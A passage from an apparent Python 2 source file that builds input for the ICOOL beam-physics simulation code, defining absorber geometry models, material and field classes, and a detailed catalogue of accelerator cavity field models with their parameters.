'num_parms': 12,
'for001_format': {
'line_splits': [1, 1, 10]}},
'VAC': {
'desc': 'Vacuum',
'doc': 'Vacuum region. Specify vacuum for mtag. Geom will be set to NONE.',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''}}},
'CBLOCK': {
'desc': 'Cylindrical block',
'doc': 'Cylindrical block',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''}}},
'ASPW': {
'desc': 'Azimuthally Symmetric Polynomial Wedge absorber region', 'doc': 'Edge shape given by '
'r(dz) = a0 + a1*dz + a2*dz^2 + a3*dz^3 in the 1st quadrant and '
'where dz is measured from the wedge center. '
'1 z position of wedge center in region [m] '
'2 z offset from wedge center to edge of absorber [m] '
'3 a0 [m] '
'4 a1 '
'5 a2 [m^(-1)] '
'6 a3 [m^(-2)]',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''},
'zpos': {
'pos': 3, 'type': 'Real', 'doc': ''},
'zoff': {
'pos': 4, 'type': 'Real', 'doc': ''},
'a0': {
'pos': 5, 'type': 'Real', 'doc': ''},
'a1': {
'pos': 6, 'type': 'Real', 'doc': ''},
'a2': {
'pos': 7, 'type': 'Real', 'doc': ''},
'a3': {
'pos': 8, 'type': 'Real', 'doc': ''}}},
'ASRW': {
'desc': 'Azimuthally Symmetric Polynomial Wedge absorber region',
'doc': 'Edge shape given by '
'r(dz) = a0 + a1*dz + a2*dz^2 + a3*dz^3 in the 1st quadrant and '
'where dz is measured from the wedge center. '
'1 z position of wedge center in region [m] '
'2 z offset from wedge center to edge of absorber [m] '
'3 a0 [m] '
'4 a1 '
'5 a2 [m^(-1)] '
'6 a3 [m^(-2)]',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''},
'zpos': {
'pos': 3, 'type': 'Real', 'doc': ''},
'zoff': {
'pos': 4, 'type': 'Real', 'doc': ''},
'a0': {
'pos': 5, 'type': 'Real', 'doc': ''},
'a1': {
'pos': 6, 'type': 'Real', 'doc': ''},
'a2': {
'pos': 7, 'type': 'Real', 'doc': ''},
'a3': {
'pos': 8, 'type': 'Real', 'doc': ''}}},
'HWIN': {
'desc': 'Hemispherical absorber end region',
'doc': '1 end flag {-1: entrance, +1: exit} '
'2 inner radius of window[m] '
'3 window thickness [m] '
'4 axial offset of center of spherical window from start of end region [m]',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''},
'end_flag': {
                    'pos': 3, 'type': 'Real', 'doc': 'End flag {-1: entrance, +1: exit}'},
'in_rad': {
'pos': 4, 'type': 'Real', 'doc': 'Inner radius of window'},
'thick': {
'pos': 5, 'type': 'Real', 'doc': 'Thickness of window'},
'offset': {
'pos': 6, 'type': 'Real', 'doc': 'Axial offset of center of spherical '
'window from start of end region [m]'}}},
'NIA': {
'desc': 'Non-isosceles absorber',
'doc': '1 zV distance of wedge “center” from start of region [m] '
'2 z0 distance from center to left edge [m] '
'3 z1 distance from center to right edge [m] '
'4 θ0 polar angle from vertex of left edge [deg] '
'5 φ0 azimuthal angle of left face [deg] '
'6 θ1 polar angle from vertex of right edge [deg] '
'7 φ1 azimuthal angle of right face [deg]',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''},
'zv': {
'pos': 3, 'type': 'Real', 'doc': 'Distance of wedge “center” from start of region [m]'},
'z0': {
'pos': 4, 'type': 'Real', 'doc': 'Distance from center to left edge [m] '},
'z1': {
                    'pos': 5, 'type': 'Real', 'doc': 'Distance from center to right edge [m]'},
'θ0': {
'pos': 6, 'type': 'Real', 'doc': 'Polar angle from vertex of left edge [deg]'},
'φ0': {
'pos': 7, 'type': 'Real', 'doc': 'Azimuthal angle of left face [deg]'},
'θ1': {
'pos': 8, 'type': 'Real', 'doc': 'Polar angle from vertex of right edge [deg] '},
'φ1': {
'pos': 9, 'type': 'Real', 'doc': 'Azimuthal angle of right face [deg]'}}},
'PWEDGE': {
'desc': 'Asymmetric polynomial wedge absorber region',
'doc': 'Imagine the wedge lying with its narrow end along the x axis. The wedge is symmetric about the '
'x-y plane. The edge shape is given by dz(x) = a0 + a1*x + a2*x^2 + a3*x^3 '
'where dz is measured from the x axis.',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''},
'init_vertex': {
'pos': 3, 'type': 'Real', 'doc': 'Initial position of the vertex along the x axis [m]'},
'z_wedge_vertex': {
'pos': 4, 'type': 'Real', 'doc': 'z position of wedge vertex [m] '},
'az': {
'pos': 5, 'type': 'Real', 'doc': 'Azimuthal angle of vector pointing to vertex in plane of wedge w.r.t. +ve x-axis [deg]'},
'width': {
'pos': 6, 'type': 'Real', 'doc': 'Total width of wedge in dispersion direction [m]'},
'height': {
'pos': 7, 'type': 'Real', 'doc': 'Total height of wedge in non-dispersion direction [m]'},
                'a0': {
                    'pos': 8, 'type': 'Real', 'doc': 'Coefficient a0 in edge shape dz(x) [m]'},
                'a1': {
                    'pos': 9, 'type': 'Real', 'doc': 'Coefficient a1 in edge shape dz(x)'},
                'a2': {
                    'pos': 10, 'type': 'Real', 'doc': 'Coefficient a2 in edge shape dz(x) [m^(-1)]'},
                'a3': {
                    'pos': 11, 'type': 'Real', 'doc': 'Coefficient a3 in edge shape dz(x) [m^(-2)]'}}},
'RING': {
'desc': 'Annular ring of material',
'doc': 'This is functionally equivalent to defining a region with two radial subregions, the first of '
'which has vacuum as the material type. However, the boundary crossing algorithm used for RING is '
'more sophisticated and should give more accurate simulations.',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''},
'inner': {
'pos': 3, 'type': 'Real', 'doc': 'Inner radius (R) [m]'},
'outer': {
'pos': 4, 'type': 'Real', 'doc': 'Outer radius (R) [m]'}}},
'WEDGE': {
'desc': 'Asymmetric wedge absorber region',
'doc': 'We begin with an isosceles triangle, sitting on its base, vertex at the top. '
'The base-to-vertex distance is W. The full opening angle at the vertex is A. Using '
'two of these triangles as sides, we construct a prism-shaped wedge. The distance from '
'one triangular side to the other is H. The shape and size of the wedge are now established. '
'We define the vertex line of the wedge to be the line connecting the vertices of its two '
'triangular sides. Next, we place the wedge in the right-handed ICOOL coordinate system. '
'The beam travels in the +Z direction. Looking downstream along the beamline (+Z into the page), '
'+X is horizontal and to the left, and +Y is up. Assume the initial position of the wedge is as '
'follows: The vertex line of the wedge is vertical and lies along the Y axis, extending from Y = -H/2 '
'to Y = +H/2. The wedge extends to the right in the direction of -X, such that it is symmetric about '
"the XY plane. (Note that it is also symmetric about the XZ plane.) From the beam's point of view, "
'particles passing on the +X side of the Y axis will not encounter the wedge, while particles passing '
'on the -X side of the Y axis see a rectangle of height H and width W, centered in the Y direction, with '
'Z thickness proportional to -X. '
'By setting parameter U to a non-zero value, the user may specify that the wedge is to be '
'translated in the X direction. If U>0, the wedge is moved (without rotation) in the +X direction. '
'For example, if U = W/2, then the wedge is centered in the X direction; its vertex is at X = W/2 '
'and its base is at X = -W/2. Note that the wedge is still symmetric about both the XY plane and '
'the XZ plane. '
'Next, the wedge may be rotated about the Z axis by angle PHI. Looking downstream in the beam '
'direction, positive rotations are clockwise and negative rotations are counter-clockwise. For '
'example, setting PHI to 90 degrees rotates the wedge about the Z axis so that its vertex line is '
'parallel to the X axis and on top, while its base is parallel to the XZ plane and at the bottom. In '
'general this rotation breaks the symmetry about the XZ plane, but the symmetry about the XY '
'plane is maintained. '
'Finally, the wedge is translated in the Z direction by a distance Zv, so that its XY symmetry plane '
'lies a distance Zv downstream of the start of the region. Usually Zv should be at least large '
'enough so that the entire volume of the wedge lies within its region, i.e. Zv .ge. W tan (A/2), the '
'maximum Z half-thickness of the wedge. As well, the region usually should be long enough to '
'contain the entire volume of the wedge, i.e. RegionLength .ge. Zv + W tan (A/2). Wedges that do '
'lie completely within their region retain their symmetry about the XY plane Z=Zv. '
'If portions of a wedge lie outside their region in Z, then the volume of the wedge lying outside '
'the region is ignored when propagating particles through the wedge. Such a wedge will grow in '
'thickness until it reaches the region boundary, but will not extend beyond it. In such cases, '
            'wedges may lose their symmetry about the XY plane Z=Zv. '
'Wedges may be defined such that they extend outside the radial boundaries of the radial '
'subregion within which they are defined. However, any portion of the wedge volume lying inside the inner '
'radial boundary or outside the outer radial boundary is ignored when propagating particles through '
'the wedge. For example, if the user intends that an entire radial subregion of circular cross-section be '
'filled with a wedge, then it is clear that the corners of the wedge must extend outside the radial region, '
"but particles passing outside the wedge's radial subregion will not see the wedge at all. "
'In short, we may say that although it is permitted (and sometimes essential) to define a wedge to '
'be larger than its subregion, for the purposes of particle propagation the wedge is always trimmed at the '
"region's Z boundaries and the subregion's radial boundaries. Any volume within the region and subregion "
'that is not occupied by the material specified for the wedge is assumed to be vacuum.'
'------------------------------------------------------------------------------------------------------------'
'Example 1: Within a region 0.4 meters long in Z, within a radial subregion extending from the Z axis out '
'to a radius of 0.3 meters, a wedge is to fill the X<0 (right) half of the 0.3 meter aperture of the '
'subregion, and increase in Z thickness proportional to -X, such that it is 0.2 meters thick at the '
'rightmost point in the subregion (X=-0.3, Y=0). The wedge is to be 0.2 meters thick at a point 0.3 '
'meters from its vertex. The half-thickness is 0.1 meters, the half-opening angle is '
'atan (0.1/0.3) = 18.4 degrees, so the full opening angle of the wedge A is 36.8 degrees. The width '
'(X extent) of the wedge must be 0.3 meters, and the height (Y extent) of the wedge must be 0.6 meters. '
'Two corners of the wedge extend well beyond the subregion, but they will be ignored during particle '
'propagation. The wedge does not need to be translated in X (U = 0) nor does it need to be rotated '
'about the Z axis (PHI = 0). For convenience we center the wedge (in Z) within its region, '
'so Zv = 0.2 meters. Since the maximum half-thickness of the wedge is only 0.1 meters, the wedge '
'does not extend beyond (or even up to) the Z boundaries of the region. The volume within the region '
'and subregion but outside the wedge is assumed to be vacuum.'
'------------------------------------------------------------------------------------------------------------'
'Example 2: In the same region and subregion, we need a wedge with the same opening angle, '
'but filling the entire aperture of the subregion, thickness gradient in the +Y direction, thickness = '
'0 at the lowest point in the subregion (X=0, Y=-0.3).'
'The wedge must now have H = W = 0.6 meters so it can fill the entire aperture of the subregion.'
'From its initial position, it must first be translated 0.3 meters in the +X direction (U = 0.3) to '
"center it in the subregion's aperture, and then (from the perspective of someone looking "
'downstream along the beam) rotated counterclockwise 90 degrees (PHI = -90.) so that the Z '
'thickness increases proportionally to +Y. Since the wedge has the same opening angle as before '
'but has twice the width, its maximum Z thickness is now 0.4 meters, just barely fitting between '
'the Z boundaries of the region if Zv = 0.2 meters. All four corners of the wedge now extend '
"outside the radial subregion's outer boundary, but they will be ignored during particle "
            'propagation.” {S.B.} '
'The wedge geometry can accept a second MTAG parameter in the SREGION construct. The first material '
'refers to the interior of the wedge. The second material, if present, refers to the exterior of the wedge. '
'If a second MTAG parameter is not present, vacuum is assumed.',
'parms': {
'mtag': {
'pos': 1, 'type': 'String', 'doc': ''},
'geom': {
'pos': 2, 'type': 'String', 'doc': ''},
'vert_ang': {
                    'pos': 3, 'type': 'Real', 'doc': 'Full angle at vertex, α (or A) [deg]'},
'vert_init': {
'pos': 4, 'type': 'Real', 'doc': 'Initial position of the vertex along the x axis, U [m]'},
'vert_z': {
'pos': 5, 'type': 'Real', 'doc': 'Z position of wedge vertex, Zv [m]'},
'vert_az': {
'pos': 6, 'type': 'Real', 'doc': 'azimuthal angle φ of vector pointing to vertex in plane of wedge w.r.t. +ve x-axis [deg]'},
'width': {
'pos': 7, 'type': 'Real', 'doc': 'Total width of wedge in dispersion direction, w [m]'},
'height': {
'pos': 8, 'type': 'Real', 'doc': 'Total height of wedge in non-dispersion direction, h [m]'}}}}
def __init__(self, **kwargs):
ModeledCommandParameter.__init__(self, kwargs)
def __setattr__(self, name, value):
if name == 'mparm':
object.__setattr__(self, name, value)
else:
ModeledCommandParameter.__setattr__(self, name, value)
def __str__(self):
return 'Material:' + ModeledCommandParameter.__str__(self)
def gen_mparm(self):
self.mparm = [0] * 12
cur_model = self.get_model_dict(self.geom)
for key in cur_model:
pos = int(cur_model[key]['pos']) - 1
val = getattr(self, key)
self.mparm[pos] = val
print self.mparm
def gen(self, file):
file.write('\n')
file.write(self.mtag)
file.write('\n')
        file.write(self.geom)
file.write('\n')
        for s in self.mparm:
            file.write(str(s))
            file.write(' ')
class NoField(Field):
"""No Field"""
begtag = 'NONE'
endtag = ''
models = {
'model_descriptor': {'desc': 'Name of model parameter descriptor',
'name': None,
'num_parms': 15,
'for001_format': {'line_splits': [15]}},
}
def __init__(self, **kwargs):
Field.__init__(self, 'NONE', kwargs)
def __call__(self, **kwargs):
Field.__call__(self, kwargs)
def __setattr__(self, name, value):
if name == 'ftag':
if value == 'NONE':
object.__setattr__(self, name, value)
else:
# Should raise exception here
print '\n Illegal attempt to set incorrect ftag.\n'
else:
Field.__setattr__(self, name, value)
def __str__(self):
# return Field.__str__(self)
return 'NONE'
def gen_fparm(self):
Field.gen_fparm(self)
class Accel(Field):
"""ACCE(L) linear accelerator fields
1 Model
1: EZ only with no transverse variation
2: cylindrical TM01p pillbox resonator
3: traveling wave cavity
4: approximate fields for symmetric circular-nosed cavity
5: user-supplied azimuthally-symmetric TM mode (SuperFish) RF field
6: induction linac model - waveform from user-supplied polynomial coefficients
7: induction linac model - internally generated waveform
8: induction linac model - waveform from user-supplied file
9: sector-shaped pillbox cavity (circular cross section)
10: variable {frequency, gradient} pillbox cavity
11: straight pillbox or SuperFish cavity in dipole region
12: sector-shaped pillbox cavity (rectangular cross section)
13: open cell standing wave cavity
The initial phase parameter can be used for any PHASEMODEL and ACCEL models 1-5.
For model = 1
2 frequency [MHz]
3 gradient on-axis at center of gap [MV/m]
4 phase shift [deg] {0-360}
5 parameter to approximate a rectangular cavity in cylindrical geometry.
if set to radius of curvature rho, then E_z is scaled by 1-x/rho, where x is the horizontal
distance from the reference circle.
6 (not used)
7 (not used)
8 mode
0 : time-independent
1: sinusoidal time variation
For model = 2
2 frequency f [MHz]
3 gradient on-axis at center of gap [MV/m]
4 phase shift [deg] {0-360}.
5 parameter to approximate a rectangular cavity in cylindrical geometry; if set to radius of
curvature rho, then the field components are scaled by 1-x/rho, where x is the horizontal
distance from the reference circle.
6 x offset of cavity [m]
7 y offset of cavity [m]
8 longitudinal mode p {0,1}
For mode = 0 Rcav = 0.383 * lambda
    For mode = 1 Rcav = 2.405 / {(2pi f)^2 - (pi/SLEN)^2}^(1/2)
For model = 3
2 frequency f [MHz]
3 gradient on-axis at center of gap [MV/m]
4 phase shift [deg] {0-360}.
5 (not used)
6 (not used)
7 (not used)
8 phase velocity of RF wave B_omega. {0<B_omega<1}
For model = 4
2 frequency [MHz]
3 gradient on-axis at center of gap [MV/m]
4 phase shift [deg] {0-360}.
5 (not used)
6 (not used)
7 (not used)
8 total length of cavity [m]
9 total gap [m]
10 radius of drift tube [m]
11 radius of nose piece [m]
For model = 5
2 frequency[MHz]
4 phase shift [deg] {0-360}.
8 file ## of azimuthally symmetric RF input file (see below) {20-99}
9 field strength normalization factor [MV/m] This multiplies the value in the SuperFish file.
10 radial cutoff for cavity [m]
11 axial distance from start of region to centerline of cavity [m]
12 axial symmetry through center of cavity
0: symmetric
1: not symmetric
    The contents of the user-supplied file FOR0##.DAT has the same format as
    the Parmela output of the SuperFish postprocessor SF07.
1.1 zmin Start of axial grid [cm]
1.2 zmax End of axial grid [cm]
1.3 Nz # of z grid points {<251}
2 frequency [MHz]
3.1 rmin Start of radial grid [cm]
3.2 rmax End of radial grid [cm]
3.3 Nr # of r grid points {<151}
for ir=1,Nr
for iz=1,Nz
4.1 Ez axial electric field [MV/m]
4.2 Er radial electric field [MV/m]
4.3 E magnitude of electric field [MV/m]
4.4 Hphi azimuthal magnetic field [A/m]
next iz
next ir
The grids should extend beyond the region where tracking will occur.
For model = 6
2 time offset from start of voltage pulse[s]
3 accelerator gap [m]
4 time reset parameter (see below)
    5 V0 term in polynomial expansion of voltage pulse [V]
    6 V1 term in polynomial expansion of voltage pulse [V / mu_s]
7 V2 term in polynomial expansion of voltage pulse [V / mu_s^2]
8 V3 term in polynomial expansion of voltage pulse [V / mu_s^3]
9 V4 term in polynomial expansion of voltage pulse [V / mu_s^4]
    10 V5 term in polynomial expansion of voltage pulse [V / mu_s^5]
    11 V6 term in polynomial expansion of voltage pulse [V / mu_s^6]
    12 V7 term in polynomial expansion of voltage pulse [V / mu_s^7]
    13 V8 term in polynomial expansion of voltage pulse [V / mu_s^8]
This model generates an EZ field across the accelerator gap. The field is time
dependent, but does not depend on z or r. The radial electric field and azimuthal
magnetic fields are assumed to be negligible. When the time reset parameter is 1,
the start time for the voltage pulse is determined from the time the reference particle
    entered the cell. The user can adjust this time using parameter #2 above.
    Subsequent cells should use parameter #4 set to 0 to sample later portions
    of the same voltage pulse. A new pulse shape can be started at any time by
    setting parameter #4 back to 1.
For model = 7
2 number of gaps
3 starting voltage [GV]
4 voltage swing [GV]
5 time offset [s]
6 target kinetic energy [GeV]
7 pulse duration [s]
8 parameter to adjust slope at end of voltage pulse
9 number of bins in voltage pulse
10 gap length [m]
    11 file # of output diagnostic file {20-99} (Set this <20 for no diagnostic output.)
12 kill particle flag (Set=1 to eliminate non-useful particles)
13 restart flag (Set =1 to restart calculation)
This model, based on a routine by Charles Kim, uses the local E-t phase space to create a voltage
waveform that attempts to flatten out the kinetic energy along the pulse. The diagnostic file contains
the following information:
Region number
Time bin, n
t(n)
V(n)
EK(n)
wt1(n) total event weight in this bin
wt2(n) event weight inside the chosen energy range
sigEK(n)
Vstart
Vend
For model = 8
2 time offset from start of voltage pulse[s]
3 accelerator gap [m]
4 time reset parameter [s](see below)
5 file number of waveform input (see format below) {20-99}
6 polynomial interpolation order, 1=> linear, 2=>quadratic, etc. {1-3}
    7 file # for output diagnostic file (see format below) {20-99}
8 time increment between diagnostic outputs to file [s]
This model generates an EZ field across the accelerator gap. The field is time
dependent, but does not depend on z or r. The radial electric field and azimuthal
magnetic fields are assumed to be negligible. The gap parameter is used to convert
the voltage profile into an electric field. The field is applied everywhere in the region.
When the time reset parameter is 1, the start time for the voltage pulse is determined
from the time the reference particle entered the cell. The user can adjust this time using
    parameter #2 above. Subsequent cells can use parameter #4 set to 0 to
    sample later portions of the same voltage pulse. A new pulse shape can be
    started at any time by setting parameter #4 back to 1.
The contents of the waveform input file FOR0##.DAT is
1) number of points N {1-100}
This is followed by N pairs
2) t(i) V(i) [s] [V]
An output diagnostic file is initialized for an induction linac region where the time reset
parameter=1 and parameter 7 above is in the range {20-99}. Output occurs when the elapsed
time from the previous output exceeds the increment given in parameter 8. Output continues for
subsequent induction linac regions provided parameter 7 remains in the specified range. The
contents of the file are
1) column id header
2) region particle z t Ez
For model = 9
2 frequency f[MHz]
3 gradient on-axis at center of gap [MV/m]
4 phase shift [deg] {0-360}.
For model = 10
2 (not used)
3 (not used)
4 phase shift [deg] {0-360}.
5 number of wavelengths separating the two reference particles
6 reset parameter (see below)
7 Total length L of buncher [m]
8 g0 [MV/m]
9 g1 [MV/m]
10 g2 [MV/m]
11 (not used)
12 phase model
0: 0-crossing time set by tREFP
1: 0-crossing time set by (1/2) * (tREFP + t REF2)
This model uses a TM010 mode pillbox cavity. It can only be used with REFP and REF2
defined and phasemodel=2,3,4. The cavity frequency is set using the number of wavelengths
(parameter 5) and the time difference between the two reference particles. When the reset
parameter is 1, the starting location of the buncher is determined from the current position
    of the reference particle. Subsequent ACCEL commands should use parameter
    #6 set to 0 to sample later portions of the gradient waveform, which is
    given by
    G = g0 + g1*(z/L) + g2*(z/L)^2
    A new pulse shape can be started at any time by setting parameter #6 back to 1.
For model = 11
2 frequency f [MHz]
3 gradient on-axis at center of gap for a pillbox cavity [MV/m]
4 phase shift [deg] {0-360}.
5 radial offset of center of cavity from reference trajectory [m]
    6 axial length of cavity [m] If this is entered as 0, the program computes the largest pillbox
    cavity that fits in the sector-shaped region
7 cavity type
0: pillbox
1: SuperFish
    8 file ## of azimuthally symmetric SuperFish RF input file (see model 5) {20-99}
9 SuperFish field normalization [MV/m] This multiplies the value in the SuperFish file.
10 SuperFish radial cut off [m]
11 axial displacement of center of SuperFish cavity from start of the region [m]
12 SuperFish axial symmetry
0: symmetric
1: not symmetric
For model = 12
2 frequency f[MHz]
3 gradient on-axis at center of gap [MV/m]
4 phase shift [deg] {0-360}.
5 radial offset of center of cavity from reference trajectory [m]
6 cavity width [m]
7 cavity height [m]
For model = 13
2 frequency f [MHz]
3 gradient on-axis at center of gap [MV/m]
4 phase shift [deg] {0-360}.
5 flag for hard edge focusing
0: both entrance and exit focusing
1: exit focusing only
2: entrance focusing only
3: no edge focusing
"""
begtag = 'ACCEL'
endtag = ''
models = {
'model_descriptor': {
'desc': 'Name of model parameter descriptor',
'name': 'model',
'num_parms': 15,
'for001_format': {
'line_splits': [15]}},
'ez': {
'desc': 'Ez only with no transverse variation',
'doc': '',
'icool_model_name': 1,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': 'Frequency [MHz]'},
'grad': {
'pos': 3, 'type': 'Real', 'doc': 'Gradient on-axis at center of gap [MV/m]'},
'phase': {
'pos': 4, 'type': 'Real', 'doc': 'Phase shift [deg] {0-360}.'},
'rect_cyn': {
'pos': 5, 'type': 'Real', 'doc': 'Parameter to approximate a rectangular cavity '
'in cylindrical geometry; if set to radius of curvature ρ, then EZ is scaled by '
'1-x/ ρ, where x is the horizontal distance from the reference circle.'},
'mode': {
'pos': 8, 'type': 'Int', 'doc': '0 : Time-independent 1: sinusoidal time variation'}}},
'cyn_pill': {
'desc': 'Cylindrical TM01p pillbox',
'doc': '', 'icool_model_name': 2,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'grad': {
'pos': 3, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 4, 'type': 'Real', 'doc': ''},
'rect_cyn': {
'pos': 5, 'type': 'Real', 'doc': ''},
'longitudinal_mode': {
'pos': 8, 'type': 'Real', 'doc': ''}}},
'trav': {
'desc': 'Traveling wave cavity',
'doc': '',
'icool_model_name': 3,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'grad': {
'pos': 3, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 4, 'type': 'Real', 'doc': ''},
'rect_cyn': {
'pos': 5, 'type': 'Real', 'doc': ''},
'x_offset': {
'pos': 6, 'type': 'Real', 'doc': ''},
'y_offset': {
'pos': 7, 'type': 'Real', 'doc': ''},
'phase_velocity': {
'pos': 8, 'type': 'Real', 'doc': ''}}},
'circ_nose': {
'desc': 'Approximate fields for symmetric circular-nosed cavity',
'doc': '',
'icool_model_name': 4,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'grad': {
'pos': 3, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 4, 'type': 'Real', 'doc': ''},
'length': {
'pos': 8, 'type': 'Real', 'doc': ''},
'gap': {
'pos': 9, 'type': 'Real', 'doc': ''},
'drift_tube_radius': {
'pos': 10, 'type': 'Real', 'doc': ''},
'nose_radius': {
'pos': 11, 'type': 'Real', 'doc': ''}}},
'az_tm': {
'desc': 'User-supplied azimuthally-symmetric TM mode (SuperFish)',
'doc': '', 'icool_model_name': 5,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 4, 'type': 'Real', 'doc': ''},
'file_no': {
'pos': 8, 'type': 'Real', 'doc': ''},
'field_strength_norm': {
'pos': 9, 'type': 'Real', 'doc': ''},
'rad_cut': {
'pos': 10, 'type': 'Real', 'doc': ''},
'axial_dist': {
'pos': 11, 'type': 'Real', 'doc': ''},
'daxial_sym': {
'pos': 12, 'type': 'Real', 'doc': ''}}},
'ilpoly': {
'desc': 'Induction linac model - waveform from user-supplied polynomial coefficients',
'doc': '', 'icool_model_name': 6,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'time_offset': {
'pos': 2, 'type': 'Real', 'doc': ''},
'gap': {
'pos': 3, 'type': 'Real', 'doc': ''},
'time_reset': {
'pos': 4, 'type': 'Real', 'doc': ''},
'v0': {
'pos': 5, 'type': 'Real', 'doc': ''},
'v1': {
'pos': 6, 'type': 'Real', 'doc': ''},
'v2': {
'pos': 7, 'type': 'Real', 'doc': ''},
'v3': {
'pos': 8, 'type': 'Real', 'doc': ''},
'v4': {
'pos': 9, 'type': 'Real', 'doc': ''},
'v5': {
'pos': 10, 'type': 'Real', 'doc': ''},
'v6': {
'pos': 11, 'type': 'Real', 'doc': ''},
'v7': {
'pos': 12, 'type': 'Real', 'doc': ''},
'v8': {
'pos': 13, 'type': 'Real', 'doc': ''}}},
'ilgen': {
'desc': 'Induction linac model - waveform from internally generated waveform',
'doc': '',
'icool_model_name': 7,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'num_gaps': {
'pos': 2, 'type': 'Real', 'doc': ''},
'start_volt': {
'pos': 3, 'type': 'Real', 'doc': ''},
'volt_swing': {
'pos': 4, 'type': 'Real', 'doc': ''},
'time_offset': {
'pos': 5, 'type': 'Real', 'doc': ''},
'kin': {
'pos': 6, 'type': 'Real', 'doc': ''},
'pulse_dur': {
'pos': 7, 'type': 'Real', 'doc': ''},
'slope': {
'pos': 8, 'type': 'Real', 'doc': ''},
'bins': {
'pos': 9, 'type': 'Real', 'doc': ''},
'gap_len': {
'pos': 10, 'type': 'Real', 'doc': ''},
'file_num': {
'pos': 11, 'type': 'Real', 'doc': ''},
'kill': {
'pos': 12, 'type': 'Real', 'doc': ''},
'restart': {
'pos': 13, 'type': 'Real', 'doc': ''}}},
'ilfile': {
'desc': 'Induction linac model - Waveform from user-supplied file',
'doc': '',
'icool_model_name': 8,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'time_offset': {
'pos': 2, 'type': 'Real', 'doc': ''},
'gap': {
'pos': 3, 'type': 'Real', 'doc': ''},
'time_reset': {
'pos': 4, 'type': 'Real', 'doc': ''},
'file_num_wav': {
'pos': 5, 'type': 'Real', 'doc': ''},
'poly_order': {
'pos': 6, 'type': 'Real', 'doc': ''},
'file_num_out': {
'pos': 7, 'type': 'Real', 'doc': ''},
'time_inc': {
'pos': 8, 'type': 'Real', 'doc': ''}}},
'sec_pill_circ': {
'desc': 'Sector-shaped pillbox cavity (circular cross section)',
'doc': '',
'icool_model_name': 9,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'grad': {
'pos': 3, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 4, 'type': 'Real', 'doc': ''}}},
'var_pill': {
'desc': 'Variable {frequency gradient} pillbox cavity',
'doc': '',
'icool_model_name': 10,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'phase': {
'pos': 2, 'type': 'Real', 'doc': ''},
'num_wavelengths': {
'pos': 3, 'type': 'Real', 'doc': ''},
'reset_parms': {
'pos': 4, 'type': 'Real', 'doc': ''},
'buncher_len': {
'pos': 5, 'type': 'Real', 'doc': ''},
'g0': {
'pos': 6, 'type': 'Real', 'doc': ''},
'g1': {
'pos': 7, 'type': 'Real', 'doc': ''},
'g2': {
'pos': 8, 'type': 'Real', 'doc': ''},
'phase_model': {
'pos': 9, 'type': 'Real', 'doc': ''}}},
'straight_pill': {
'desc': 'Straight pillbox or SuperFish cavity in dipole region',
'doc': '',
'icool_model_name': 11,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'grad': {
'pos': 3, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 4, 'type': 'Real', 'doc': ''},
'radial_offset': {
'pos': 5, 'type': 'Real', 'doc': ''},
'axial_length': {
'pos': 6, 'type': 'Real', 'doc': ''},
'cavity_type': {
'pos': 7, 'type': 'Real', 'doc': ''},
'file_num': {
'pos': 8, 'type': 'Real', 'doc': ''},
'sf_field_norm': {
'pos': 9, 'type': 'Real', 'doc': ''},
'sf_rad_cut': {
'pos': 10, 'type': 'Real', 'doc': ''},
'sf_axial_disp': {
'pos': 11, 'type': 'Real', 'doc': ''},
'sf_axial_sym': {
'pos': 12, 'type': 'Real', 'doc': ''}}},
'sec_pill_rec': {
'desc': 'Sector-shaped pillbox cavity (rectangular cross section)',
'doc': '',
'icool_model_name': 12,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'grad': {
'pos': 3, 'type': 'Real', 'doc': ''},
'phase': {
'pos': 4, 'type': 'Real', 'doc': ''},
'rad_offset': {
'pos': 5, 'type': 'Real', 'doc': ''},
'width': {
'pos': 6, 'type': 'Real', 'doc': ''},
'height': {
'pos': 7, 'type': 'Real', 'doc': ''}}},
'open_cell_stand': {
'desc': 'Open cell standing wave cavity',
'doc': '',
'icool_model_name': 13,
'parms': {
'model': {
'pos': 1, 'type': 'String', 'doc': ''},
'freq': {
'pos': 2, 'type': 'Real', 'doc': ''},
'grad': {
'pos': 3, 'type': 'Real', 'doc': ''},
'phase': {
